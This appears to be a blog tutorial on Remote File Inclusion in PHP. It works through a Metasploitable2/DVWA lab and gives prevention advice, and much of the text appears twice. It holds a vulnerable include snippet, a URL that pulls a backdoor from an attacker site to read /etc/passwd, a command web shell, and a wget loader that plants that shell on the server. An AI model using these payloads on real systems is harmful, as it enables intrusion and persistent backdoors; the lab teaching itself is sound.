RFI stands for Remote File Inclusion, this vulnerability allows an attacker to dynamically include files/scripts from remote/external sources into the web server. This vulnerability occurs due to poorly implemented security checks and sanitization. The successful exploitation of RFI vulnerability leads to remote code execution, Cross Site Scripting, Information disclosure etc. For example :
In this example i am going to use Metasploitable2 VM. The download links are given below :
Download Link : https://download.vulnhub.com/metasploitable/metasploitable-linux-2.0.0.zip
And you also need to enable "allow_url_include" option in Metasploitable2, to do that just open the file '/etc/php5/cgi/php.ini' with nano or vi editor and in Line number 576
Now we try to include an external file from remote source.
File : shell.php
And in the web application, the url will be :
And as we can see the 'ls' command is successfully executed on the web server. We can also drop our backdoor file on the web server with below code
File : load.php
Preventing Remote File Inclusion (RFI) vulnerability
The best way to eliminate Remote File Inclusion (RFI) vulnerabilities is to avoid dynamically including files based on user input. If this is not possible, the application should maintain a whitelist of files that can be included in order to limit the attacker’s control over what gets included. We can also minimize the risk of RFI attacks through proper input validation and sanitization. it’s always preferable to sanitize user-supplied/controlled inputs to the best of your ability. These inputs include:
<?php $file = $_GET['file']; include($file); ?>The above page takes file name as input and include that file.
website.com/test.php?file=page1 website.com/test.php?file=http://attackersite.com/backdoor.php&cmd=cat%20/etc/passwdIn this example i am going to use Metasploitable2 VM. The download links are given below :
Download Link : https://download.vulnhub.com/metasploitable/metasploitable-linux-2.0.0.zip
And you also need to enable "allow_url_include" option in Metasploitable2, to do that just open the file '/etc/php5/cgi/php.ini' with nano or vi editor and in Line number 576
allow_url_include = Off allow_url_include = OnNow we try to include an external file from remote source.
File : shell.php
<?php $cmd = $_GET['cmd']; system($cmd); ?>URL of php file is : http://192.168.56.1:8000/shell.php
And in the web application, the url will be :
/dvwa/vulnerabilities/fi/?page=http://192.168.56.1:8000/shell.php&cmd=ls
And as we can see the 'ls' command is successfully executed on the web server. We can also drop our backdoor file on the web server with below code
File : load.php
<?php
shell_exec('wget http://192.168.56.1:8000/shell.php -O /var/www/shell.php')
?>
The above code will download shell.php and store it on /var/www/ directory. http://192.168.56.101/dvwa/vulnerabilities/fi/?page=http://192.168.56.1:8000/load.php http://192.168.56.101/shell.php?cmd=<command_to_run>
Preventing Remote File Inclusion (RFI) vulnerability
The best way to eliminate Remote File Inclusion (RFI) vulnerabilities is to avoid dynamically including files based on user input. If this is not possible, the application should maintain a whitelist of files that can be included in order to limit the attacker’s control over what gets included. We can also minimize the risk of RFI attacks through proper input validation and sanitization. it’s always preferable to sanitize user-supplied/controlled inputs to the best of your ability. These inputs include:
- GET/POST parameters
- URL parameters
- Cookie values
- HTTP header values
It is also recommended to implement validation mechanisms on the server side, because client side validation can be easily bypassed by using a proxy tool like burp suite, ZAP proxy etc.
Additionally, in the case of PHP, most modern PHP configurations are configured with allow_url_include set to off, which would not allow an attacker to include remote files, but it still be vulnerable to Local File Inclusion attack.
Links to other posts :
Links to other posts :